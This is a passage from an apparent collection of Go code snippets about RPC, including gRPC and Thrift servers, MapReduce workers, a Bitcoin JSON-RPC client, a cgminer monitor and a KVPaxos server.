service)\n\t//server.Serve(listen)\n\n\t// =====search.pb.goのやつ========\n\tlisten, err := net.Listen(\"tcp\", \"localhost:5555\")\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tserver := grpc.NewServer()\n\tservice := &searchService{}\n\t// Register reflection service on gRPC server.\n\treflection.Register(server)\n\tpb.RegisterSearchServiceServer(server, service)\n\t_ = server.Serve(listen)\n}", "func rpc_Go(method string, args Triplet, resp *Response, ip string, port int, cs chan *rpc.Call) interface{} {\n\ttempClient, err := jsonrpc.Dial(serverInfo1.Protocol, ip+\":\"+strconv.Itoa(port))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\t(*resp).client = tempClient\n\ttempClient.Go(\"DICT3.\"+method, args, resp, cs)\n\treturn nil\n}", "func bitcoinRPC(arguments *bitcoinArguments, reply *bitcoinReply) error {\n\n\ts, err := json.Marshal(arguments)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalBitcoinData.log.Debugf(\"rpc send: %s\", s)\n\n\tpostData := bytes.NewBuffer(s)\n\n\trequest, err := http.NewRequest(\"POST\", globalBitcoinData.url, postData)\n\tif nil != err {\n\t\treturn err\n\t}\n\trequest.SetBasicAuth(globalBitcoinData.username, globalBitcoinData.password)\n\n\tresponse, err := globalBitcoinData.client.Do(request)\n\tif nil != err {\n\t\treturn err\n\t}\n\tdefer response.Body.Close()\n\tbody, err := ioutil.ReadAll(response.Body)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\terr = json.Unmarshal(body, &reply)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalBitcoinData.log.Debugf(\"rpc receive: %s\", body)\n\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\tworkID := RegisterWorker()\n\n\tfor {\n\t\ttask := RequestTask(workID)\n\t\tif !task.Alive {\n\t\t\tfmt.Printf(\"Worker get task is not alive, %d\\n\", workID)\n\t\t\treturn\n\t\t}\n\t\tDoTask(task, workID, mapf, reducef)\n\t}\n\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func bitcoinRPC(arguments *bitcoinArguments, reply *bitcoinReply) error {\n\n\ts, err := json.Marshal(arguments)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Tracef(\"rpc send: %s\", s)\n\n\tpostData := bytes.NewBuffer(s)\n\n\trequest, err := http.NewRequest(\"POST\", globalData.url, postData)\n\tif nil != err {\n\t\treturn err\n\t}\n\trequest.SetBasicAuth(globalData.username, globalData.password)\n\n\tresponse, err := globalData.client.Do(request)\n\tif nil != err {\n\t\treturn err\n\t}\n\tdefer response.Body.Close()\n\tbody, err := ioutil.ReadAll(response.Body)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Tracef(\"rpc response body: %s\", body)\n\n\terr = json.Unmarshal(body, &reply)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Debugf(\"rpc receive: %s\", body)\n\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor{\n\t\tgetNext := GetTask(mapf, reducef)\n\t\tif(!getNext){\n\t\t\tbreak\n\t\t}\n\t}\n\t\n}", "func rpcClient(name, ip string, refInt int, minerInfo *MinerInformation, wg *sync.WaitGroup, threshold float64) {\n\t//Add everything except the connection\n\tc := Client{name, ip, nil, refInt, minerInfo, nil, threshold, int(time.Now().Unix())}\n\t//Save the Client struct in the MinerInfo\n\tc.MinerInfo.Client = &c\n\n\tclientRequests := make(chan RpcRequest)\n\tc.ClientRequests = clientRequests\n\n\t//Start the thread the will keep doing summary requests\n\tgo SummaryHandler(clientRequests, minerInfo, &c, wg)\n\t//Start another thread the will ask the devs requests\n\tgo DevsHandler(clientRequests, minerInfo, &c, wg)\n\n\t//Wait for new requst to make from the clienReequest channel\n\tfor r := range clientRequests {\n\t\t//Create a new connection\n\t\tc.Conn = createConnection(c.IP)\n\n\t\t//If c.Conn is still nil then we couldn't connect\n\t\t//So send back an empty slice of bytes\n\t\tif c.Conn == nil {\n\t\t\tlog.Printf(\"[rpcClient] - Could not connect to the client - %s\\n\",c.Name)\n\t\t\tr.ResultChan <- make([]byte, 0)\n\n\t\t} else {\n\t\t\t//Send the request to the cgminer\n\t\t\tb := sendCommand(&c.Conn, r.Request)\n\t\t\t/* \n\t\t\t * Note:\n\t\t\t *\n\t\t\t * It seems that cgminer close the tcp connection\n\t\t\t * after each call so we need to reset it for i := 0; i < count; i++ {\n\t\t\t \t\n\t\t\t }\n\t\t\t * the next rpc-call\n\t\t\t */\n\t\t\tc.Conn.Close()\n\n\t\t\t//And send back the result\n\t\t\tr.ResultChan <- b\n\t\t}\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tfor {\n\t\ttime.Sleep(time.Second)\n\n\t\treq := GetTaskReq{}\n\t\treq.No = 1\n\t\trsp := GetTaskRsp{}\n\t\tok := call(\"Master.GetTask\", &req, &rsp)\n\t\tif ok {\n\t\t\tfmt.Println(rsp.Status, rsp.TaskID, len(rsp.Filename) > 0)\n\t\t\tif rsp.Status == \"Wait\" {\n\t\t\t\t// do nothing\n\t\t\t} else if rsp.Status == \"Task\" {\n\t\t\t\tdoTask(&req, &rsp, mapf, reducef)\n\t\t\t} else if rsp.Status == \"Exit\" {\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\tfmt.Printf(\"unknow status\\n\")\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(\"rpc error\")\n\t\t}\n\n\t}\n\t// uncomment to send the Example RPC to the master.\n\tCallExample()\n\n}", "func RPC_Service() {\n\tapi := new(API)\n\terr := rpc.Register(api)\n\tif err != nil {\n\t\tlog.Fatal(\"error registering API\", err)\n\t}\n\trpc.HandleHTTP()\n\n\tlistener, err := net.Listen(\"tcp\", \"127.0.0.1:8080\")\n\n\tif err != nil {\n\t\tlog.Fatal(\"Listener error\", err)\n\t}\n\tlog.Printf(\"serving rpc on port %d\", 8080)\n\thttp.Serve(listener, nil)\n\n\tif err != nil {\n\t\tlog.Fatal(\"error serving: \", err)\n\t}\n}", "func RunRPC() error {\n\n\t// Get flags\n\ttraceserviceaccountfile := viper.GetString(\"traceserviceaccountfile\")\n\tif traceserviceaccountfile == \"\" {\n\t\treturn errors.New(\"You must supply a valid service account for tracing using the `traceserviceaccountfile` flag\")\n\t}\n\n\tprojectid := viper.GetString(\"projectid\")\n\tif projectid == \"\" {\n\t\treturn errors.New(\"You must provide a valid project id using the `projectid` argument\")\n\t}\n\n\t// Create a stackdriver exporter for traces.\n\tstackExporter, err := stackdriver.NewExporter(stackdriver.Options{\n\t\tProjectID: projectid,\n\t\tTraceClientOptions: []option.ClientOption{\n\t\t\toption.WithCredentialsFile(traceserviceaccountfile),\n\t\t},\n\t})\n\tif err != nil {\n\t\twerr := errors.Wrap(err, \"stackdriver.NewExporter\")\n\t\tphdlog.Info(logMessage,\n\t\t\t\"\",\n\t\t\tzap.String(\"processStatus\", \"unable to create stackdriver exporter\"),\n\t\t\tzap.String(\"error\", werr.Error()))\n\t\treturn werr\n\t}\n\t// Register the stackdriver exporter.\n\ttrace.RegisterExporter(stackExporter)\n\n\trpcPort := \":\" + viper.GetString(\"rpc-port\")\n\tif rpcPort == \":\" {\n\t\treturn errors.New(\"You must supply a valid port using the 'rpc-port' argument\")\n\t}\n\tlis, err := net.Listen(\"tcp\", rpcPort)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to initialize TCP listen: %v\")\n\t}\n\n\tdefer func() {\n\t\tif ferr := lis.Close(); err != nil {\n\t\t\tphdlog.Error(logMessage, \"\", zap.String(\"error\", ferr.Error()))\n\t\t}\n\t}()\n\n\trpcServer := grpc.NewServer(\n\t\tgrpc.StatsHandler(&ocgrpc.ServerHandler{\n\t\t\tStartOptions: trace.StartOptions{\n\t\t\t\tSampler: trace.AlwaysSample(),\n\t\t\t},\n\t\t}),\n\t\tgrpc.UnaryInterceptor(\n\t\t\tgrpc_middleware.ChainUnaryServer(\n\t\t\t\tgrpcmw.ConversationIDMiddleware(),\n\t\t\t\tgrpcmw.LoggerMiddleware(),\n\t\t\t),\n\t\t),\n\t)\n\tvar service *handlers.RestServiceServer\n\tservice, err = handlers.NewRest()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tpb.RegisterRestServiceServer(rpcServer, service)\n\n\tphdlog.Info(logMessage, \"\", zap.String(\"RPC Listening on\", lis.Addr().String()))\n\treturn rpcServer.Serve(lis)\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\tfor {\n\t\thargs := HandlerArgs{}\n\t\threply := HandlerReply{}\n\n\t\tcall(\"Coordinator.Handler\", &hargs, &hreply)\n\t\t//log.Println(\"hreply\", hreply)\n\t\tif hreply.JobType == \"map\" {\n\n\t\t\tfile, err := os.Open(hreply.MapFile)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open %v\", hreply.MapFile)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", hreply.MapFile)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t\tkva := mapf(hreply.MapFile, string(content))\n\n\t\t\ttotal := []*json.Encoder{}\n\n\t\t\tfor i := 0; i < hreply.ReduceNum; i++ {\n\t\t\t\ttmp, err := os.Create(fmt.Sprintf(\"mr-%v-%v.json\", hreply.MapIndex, i))\n\t\t\t\tdefer tmp.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t\tenc := json.NewEncoder(tmp)\n\t\t\t\ttotal = append(total, enc)\n\t\t\t}\n\n\t\t\tfor _, onekva := range kva {\n\t\t\t\tcurr := total[ihash(onekva.Key)%10]\n\t\t\t\tcurr.Encode(&onekva)\n\t\t\t}\n\t\t\tlog.Printf(\"map job mr-%v finished\", hreply.MapIndex)\n\n\t\t\tnargs := NotifyArgs{}\n\t\t\tnreply := NotifyReply{}\n\t\t\tnargs.NotifyType = \"map\"\n\t\t\tnargs.NotifyIndex = hreply.MapIndex\n\n\t\t\tcall(\"Coordinator.Notify\", &nargs, &nreply)\n\n\t\t} else if hreply.JobType == \"reduce\" {\n\n\t\t\tkva := []KeyValue{}\n\t\t\tfor i := 0; i < hreply.MapNum; i++ {\n\t\t\t\ttmp, err := os.Open(fmt.Sprintf(\"mr-%v-%v.json\", i, hreply.ReduceIndex))\n\t\t\t\tdefer tmp.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\n\t\t\t\tdec := json.NewDecoder(tmp)\n\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tkva = append(kva, kv)\n\t\t\t\t}\n\t\t\t}\n\t\t\tsort.Sort(ByKey(kva))\n\t\t\toname := fmt.Sprintf(\"mr-out-%v\", hreply.ReduceIndex)\n\t\t\tofile, _ := os.Create(oname)\n\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tlog.Printf(\"reduce job mr-%v finished\", hreply.ReduceIndex)\n\n\t\t\tnargs := NotifyArgs{}\n\t\t\tnreply := NotifyReply{}\n\t\t\tnargs.NotifyType = \"reduce\"\n\t\t\tnargs.NotifyIndex = hreply.ReduceIndex\n\n\t\t\tcall(\"Coordinator.Notify\", &nargs, &nreply)\n\n\t\t} else if hreply.JobType == \" retry\" {\n\t\t\t//log.Println(\"retry--------------\")\n\t\t} else if hreply.JobType == \"alldone\" {\n\t\t\tos.Exit(0)\n\t\t} else {\n\t\t\t//log.Println(\"sleeping 1 second\")\n\t\t\ttime.Sleep(100 * time.Microsecond)\n\t\t}\n\t}\n\t// uncomment to send the Example RPC to the coordinator.\n\t// CallExample()\n\n}", "func main() {\n\n\t// Prepare some dependencies:\n\tlogger := logrus.New()\n\tstorer := new(storageMocks.FakeStorer)\n\n\t// Program the storer mock to respond with _something_:\n\tstorer.CreateCruftReturns(\"12345\", nil)\n\tstorer.ReadCruftReturns(nil, storage.ErrNotFound)\n\n\t// Inject the dependencies into a new Handler:\n\thandler := serviceHandler.New(logger, storer)\n\n\t// Make a new GRPC Server (usually I would have this in a common / shared library, and pre-load it with middleware built from our logger / instrumenter / tracer interfaces):\n\tgrpcServer := grpc.NewServer()\n\n\t// Register our Handler and GRPC Server with our generated service-proto code:\n\tserviceProto.RegisterExampleServer(grpcServer, handler)\n\n\t// Listen for connections:\n\tlistener, err := net.Listen(\"tcp\", listenAddress)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Unable to start GRPC server on TCP address %s\", listenAddress)\n\t}\n\n\t// Start the GRPC server:\n\tif err := grpcServer.Serve(listener); err != nil {\n\t\tlogger.Fatalf(\"Unable to start the GRPC server: %v\", err)\n\t}\n}", "func workerTask() {\n\tworker, err := zmq4.NewSocket(zmq4.REQ)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"ipc://backend.ipc\")\n\tworker.SendMessage(WorkerReady)\n\n\tfor {\n\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tmsg[len(msg)-1] = \"OK\"\n\t\tworker.SendMessage(msg)\n\t}\n\n}", "func (s *Server) call(req *Request) *Response {\n\t// TODO: simplfy this function, or split into several functions\n\tdot := strings.LastIndex(req.Method, \".\") // split req.Method like \"type.Method\"\n\tif dot < 0 {\n\t\terr := errors.New(\"rpc: service/method request ill-formed: \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(ParseErr, err.Error(), err))\n\t}\n\n\tserviceName := req.Method[:dot]\n\tmethodName := req.Method[dot+1:]\n\n\t// method existed or not\n\tsvci, ok := s.m.Load(serviceName)\n\tif !ok {\n\t\terr := errors.New(\"rpc: can't find service \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(MethodNotFound, err.Error(), nil))\n\t}\n\tsvc := svci.(*service)\n\tmtype := svc.method[methodName]\n\tif mtype == nil {\n\t\terr := errors.New(\"rpc: can't find method \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(MethodNotFound, err.Error(), nil))\n\t}\n\n\t// to prepare argv and replyv in reflect.Value\n\t// ref to `net/http/rpc`\n\targIsValue := false // if true, need to indirect before calling.\n\tvar argv reflect.Value\n\tif mtype.ArgType.Kind() == reflect.Ptr {\n\t\targv = reflect.New(mtype.ArgType.Elem())\n\t} else {\n\t\targv = reflect.New(mtype.ArgType)\n\t\targIsValue = true\n\t}\n\n\t// argv guaranteed to be a pointer now.\n\tif argIsValue {\n\t\targv = argv.Elem()\n\t}\n\n\tconvert(req.Params, argv.Interface())\n\t// fmt.Println(argv.Interface())\n\n\treplyv := reflect.New(mtype.ReplyType.Elem())\n\tswitch mtype.ReplyType.Elem().Kind() {\n\tcase reflect.Map:\n\t\treplyv.Elem().Set(reflect.MakeMap(mtype.ReplyType.Elem()))\n\tcase reflect.Slice:\n\t\treplyv.Elem().Set(reflect.MakeSlice(mtype.ReplyType.Elem(), 0, 0))\n\t}\n\n\treturn svc.call(mtype, req, argv, replyv)\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\tgob.Register(MapJob{})\n\tgob.Register(ReduceJob{})\n\tsockname := coordinatorSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\n\tfmt.Println(err)\n\treturn false\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t//Your worker implementation here.\n\tmJobChan := make(chan MRJob)\n\trJobChan := make(chan MRJob)\n\tctx, cancel := context.WithCancel(context.Background()) // used to manage the MR Job\n\targs := MRArgs{\n\t\tStatus: \"INITIAL\",\n\t}\n\n\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\n\tfor {\n\t\tselect {\n\t\tcase mJob := <-mJobChan:\n\t\t\terr := doMap(mapf, mJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = mJob.JobNum\n\t\t\targs.RId = -1\n\t\t\targs.JobType = \"MAP\"\n\t\t\tlog.Printf(\"MAP: %v, %v request Job\", args.Status, args.MId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase rJob := <-rJobChan:\n\t\t\terr := doReduce(reducef, rJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = -1\n\t\t\targs.RId = rJob.JobNum\n\t\t\targs.JobType = \"REDUCE\"\n\t\t\tlog.Printf(\"REDUCE: %v %v, request Job\", args.Status, args.RId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase <-ctx.Done():\n\t\t\tlog.Println(\"Worker is stopped\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// uncomment to send the Example RPC to the master.\n\t//CallExample()\n}", "func (f *Function) fwdRPC(ctx context.Context, reqPayload string) (*hpb.HelloReply, error) {\n\tf.RLock()\n\tdefer f.RUnlock()\n\n\tlogger := log.WithFields(log.Fields{\"fID\": f.fID})\n\n\tfuncClient := *f.funcClient\n\n\tlogger.Debug(\"FwdRPC: Forwarding RPC to function instance\")\n\tresp, err := funcClient.SayHello(ctx, &hpb.HelloRequest{Name: reqPayload})\n\tlogger.Debug(\"FwdRPC: Received a response from the function instance\")\n\n\treturn resp, err\n}", "func (r *Runner) ServeHTTP(w http.ResponseWriter, req *http.Request) {\n\tr.rpc.ServeHTTP(w, req)\n}", "func main() {\n\n\tconst apiName = \"handle1\"\n\ttStr := `_` + I.ToS(time.Now().UnixNano())\n\tif len(os.Args) > 1 {\n\t\tapp := fiber.New()\n\n\t\tmode := os.Args[1]\n\t\tswitch mode {\n\t\tcase `apiserver`:\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\treturn c.SendString(I.ToS(rand.Int63()) + tStr)\n\t\t\t})\n\n\t\tcase `apiproxy`:\n\t\t\t// connect as request on request-reply\n\n\t\t\tconst N = 8\n\t\t\tcounter := uint32(0)\n\t\t\tncs := [N]*nats.Conn{}\n\t\t\tmutex := sync.Mutex{}\n\t\t\tconn := func() *nats.Conn {\n\t\t\t\tidx := atomic.AddUint32(&counter, 1) % N\n\t\t\t\tnc := ncs[idx]\n\t\t\t\tif nc != nil {\n\t\t\t\t\treturn nc\n\t\t\t\t}\n\t\t\t\tmutex.Lock()\n\t\t\t\tdefer mutex.Unlock()\n\t\t\t\tif ncs[idx] != nil {\n\t\t\t\t\treturn ncs[idx]\n\t\t\t\t}\n\t\t\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\t\t\tL.PanicIf(err, `nats.Connect`)\n\t\t\t\tncs[idx] = nc\n\t\t\t\treturn nc\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\tfor _, nc := range ncs {\n\t\t\t\t\tif nc != nil {\n\t\t\t\t\t\tnc.Close()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\t// handler\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\tmsg, err := conn().Request(apiName, []byte(I.ToS(rand.Int63())), time.Second)\n\t\t\t\tif L.IsError(err, `nc.Request`) {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\t// Use the response\n\t\t\t\treturn c.SendString(string(msg.Data))\n\t\t\t})\n\t\tdefault:\n\t\t}\n\n\t\tlog.Println(mode + ` started ` + tStr)\n\t\tlog.Fatal(app.Listen(\":3000\"))\n\n\t} else {\n\t\t// worker\n\t\tlog.Println(`worker started ` + tStr)\n\n\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\tL.PanicIf(err, `nats.Connect`)\n\t\tdefer nc.Close()\n\n\t\tconst queueName = `myqueue`\n\n\t\t//// connect as reply on request-reply (sync)\n\t\t//sub, err := nc.QueueSubscribeSync(apiName, queueName)\n\t\t//L.PanicIf(err, `nc.SubscribeSync`)\n\t\t//\n\t\t////Wait for a message\n\t\t//for {\n\t\t//\tmsg, err := sub.NextMsgWithContext(context.Background())\n\t\t//\tL.PanicIf(err, `sub.NextMsgWithContext`)\n\t\t//\n\t\t//\terr = msg.Respond([]byte(string(msg.Data) + tStr))\n\t\t//\tL.PanicIf(err, `msg.Respond`)\n\t\t//}\n\n\t\t//// channel (async) -- error slow consumer\n\t\t//ch := make(chan *nats.Msg, 1)\n\t\t//_, err = nc.ChanQueueSubscribe(apiName, queueName, ch)\n\t\t//L.PanicIf(err, `nc.ChanSubscribe`)\n\t\t//for {\n\t\t//\tselect {\n\t\t//\tcase msg := <-ch:\n\t\t//\t\tL.PanicIf(msg.Respond([]byte(string(msg.Data)+tStr)), `msg.Respond`)\n\t\t//\t}\n\t\t//}\n\n\t\t// callback (async)\n\t\t_, err = nc.QueueSubscribe(apiName, queueName, func(msg *nats.Msg) {\n\t\t\tres := string(msg.Data) + tStr\n\t\t\tL.PanicIf(msg.Respond([]byte(res)), `msg.Respond`)\n\t\t})\n\n\t\tvar line string\n\t\tfmt.Scanln(&line) // wait for input so not exit\n\t}\n}", "func StartServer(servers []string, me int) *KVPaxos {\n // this call is all that's needed to persuade\n // Go's RPC library to marshall/unmarshall\n // struct Op.\n gob.Register(Op{})\n\n kv := new(KVPaxos)\n kv.me = me\n\n // Your initialization code here.\n kv.data = make(map[string]string)\n kv.pendingRead = make(map[int64]*PendingRead)\n kv.applied = -1\n\n rpcs := rpc.NewServer()\n rpcs.Register(kv)\n\n kv.px = paxos.Make(servers, me, rpcs)\n\n // start worker\n kv.StartBackgroundWorker()\n\n os.Remove(servers[me])\n l, e := net.Listen(\"unix\", servers[me]);\n if e != nil {\n log.Fatal(\"listen error: \", e);\n }\n kv.l = l\n\n // please do not change any of the following code,\n // or do anything to subvert it.\n\n go func() {\n for kv.dead == false {\n conn, err := kv.l.Accept()\n if err == nil && kv.dead == false {\n if kv.unreliable && (rand.Int63() % 1000) < 100 {\n // discard the request.\n conn.Close()\n } else if kv.unreliable && (rand.Int63() % 1000) < 200 {\n // process the request but force discard of reply.\n c1 := conn.(*net.UnixConn)\n f, _ := c1.File()\n err := syscall.Shutdown(int(f.Fd()), syscall.SHUT_WR)\n if err != nil {\n fmt.Printf(\"shutdown: %v\\n\", err)\n }\n go rpcs.ServeConn(conn)\n } else {\n go rpcs.ServeConn(conn)\n }\n } else if err == nil {\n conn.Close()\n }\n if err != nil && kv.dead == false {\n fmt.Printf(\"KVPaxos(%v) accept: %v\\n\", me, err.Error())\n kv.kill()\n }\n }\n }()\n\n return kv\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the coordinator.\n\t// CallExample()\n\n\tfor {\n\t\trequestArgs := RequestTaskArgs{}\n\t\trequestReply := RequestTaskReply{}\n\t\tfinishArgs := FinishTaskArgs{}\n\t\tfinishReply := FinishTaskReply{}\n\t\tif !call(\"Coordinator.RequestTask\", &requestArgs, &requestReply) {\n\t\t\tbreak\n\t\t}\n\t\tfinishArgs.Id = requestReply.Id\n\t\tfinishArgs.Type = requestReply.Type\n\t\tif requestReply.Type == Map {\n\t\t\tmapper(&requestReply, mapf)\n\t\t\tcall(\"Coordinator.FinishTask\", &finishArgs, &finishReply)\n\t\t} else if requestReply.Type == Reduce {\n\t\t\treducer(&requestReply, reducef)\n\t\t\tcall(\"Coordinator.FinishTask\", &finishArgs, &finishReply)\n\t\t} else if requestReply.Type == Exit {\n\t\t\tbreak\n\t\t} else {\n\t\t\tlog.Fatalf(\"unknown task type %v\", requestReply.Type)\n\t\t}\n\t}\n}", "func (this *Engine) launchRpcServe() (done chan null.NullStruct) {\n\tvar (\n\t\tprotocolFactory thrift.TProtocolFactory\n\t\tserverTransport thrift.TServerTransport\n\t\ttransportFactory thrift.TTransportFactory\n\t\terr error\n\t\tserverNetwork string\n\t)\n\n\tswitch config.Engine.Rpc.Protocol {\n\tcase \"binary\":\n\t\tprotocolFactory = thrift.NewTBinaryProtocolFactoryDefault()\n\n\tcase \"json\":\n\t\tprotocolFactory = thrift.NewTJSONProtocolFactory()\n\n\tcase \"simplejson\":\n\t\tprotocolFactory = thrift.NewTSimpleJSONProtocolFactory()\n\n\tcase \"compact\":\n\t\tprotocolFactory = thrift.NewTCompactProtocolFactory()\n\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"Unknown protocol: %s\", config.Engine.Rpc.Protocol))\n\t}\n\n\t// client-side Thrift protocol/transport stack must match\n\t// the server-side, otherwise you are very likely to get in trouble\n\tswitch {\n\tcase config.Engine.Rpc.Framed:\n\t\t// each payload is sent over the wire with a frame header containing its size\n\t\ttransportFactory = thrift.NewTFramedTransportFactory(transportFactory)\n\n\tdefault:\n\t\t// there is no BufferedTransport in Java: only FramedTransport\n\t\ttransportFactory = thrift.NewTBufferedTransportFactory(\n\t\t\tconfig.Engine.Rpc.BufferSize)\n\t}\n\n\tswitch {\n\tcase strings.Contains(config.Engine.Rpc.ListenAddr, \"/\"):\n\t\tserverNetwork = \"unix\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = NewTUnixSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = NewTUnixSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\n\tdefault:\n\t\tserverNetwork = \"tcp\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = thrift.NewTServerSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = thrift.NewTServerSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\t}\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// dial zk before startup servants\n\t// because proxy servant is dependent upon zk\n\tif config.Engine.EtcdSelfAddr != \"\" {\n\t\tif err := etclib.Dial(config.Engine.EtcdServers); err != nil {\n\t\t\tpanic(err)\n\t\t} else {\n\t\t\tlog.Debug(\"etcd connected: %+v\", config.Engine.EtcdServers)\n\t\t}\n\t}\n\n\t// when config loaded, create the servants\n\tthis.svt = servant.NewFunServantWrapper(config.Engine.Servants)\n\tthis.rpcProcessor = rpc.NewFunServantProcessor(this.svt)\n\tthis.svt.Start()\n\n\tthis.rpcServer = NewTFunServer(this,\n\t\tconfig.Engine.Rpc.PreforkMode,\n\t\tthis.rpcProcessor,\n\t\tserverTransport, transportFactory, protocolFactory)\n\tlog.Info(\"RPC server ready at %s:%s\", serverNetwork, config.Engine.Rpc.ListenAddr)\n\n\tthis.launchDashboard()\n\n\tdone = make(chan null.NullStruct)\n\tgo func() {\n\t\tif err = this.rpcServer.Serve(); err != nil {\n\t\t\tlog.Error(\"RPC server: %+v\", err)\n\t\t}\n\n\t\tdone <- null.Null\n\t}()\n\n\treturn done\n}", "func RunRPC() error {\n\tvar servicename = viper.GetString(\"servicename\")\n\tif servicename == \"\" {\n\t\treturn errors.New(\"You must supply a valid servicename for logging using the `servicename` flag\")\n\t}\n\n\tvar rpcPort = viper.GetString(\"rpc-port\")\n\tif rpcPort == \"\" {\n\t\treturn errors.New(\"You must supply a valid port using the 'rpc-port' argument\")\n\t}\n\n\tvar lis, err = net.Listen(\"tcp\", \":\"+rpcPort)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to initialize TCP listen\")\n\t}\n\n\tdefer func() {\n\t\tvar err = lis.Close()\n\t\tif err != nil {\n\t\t\t// log\n\t\t}\n\t}()\n\n\t// Switch on a config file\n\t// switch {}\n\n\tds, err := datastore.New(phdstore.DSConfig{\n\t\tContext: context.Background(),\n\t\tServiceAccountFile: \"/Users/sgg7269/Documents/serviceAccountFiles/ds-serviceaccount.json\",\n\t\tProjectID: \"phdigidev\",\n\t\tNamespace: \"storage_test\",\n\t})\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"handlers.NewGeosearch\")\n\t}\n\n\t// Try to make a new Geosearch before even starting the server\n\ts, err := handlers.New(ds)\n\tif err != nil {\n\t\treturn errors.Wrap(err, 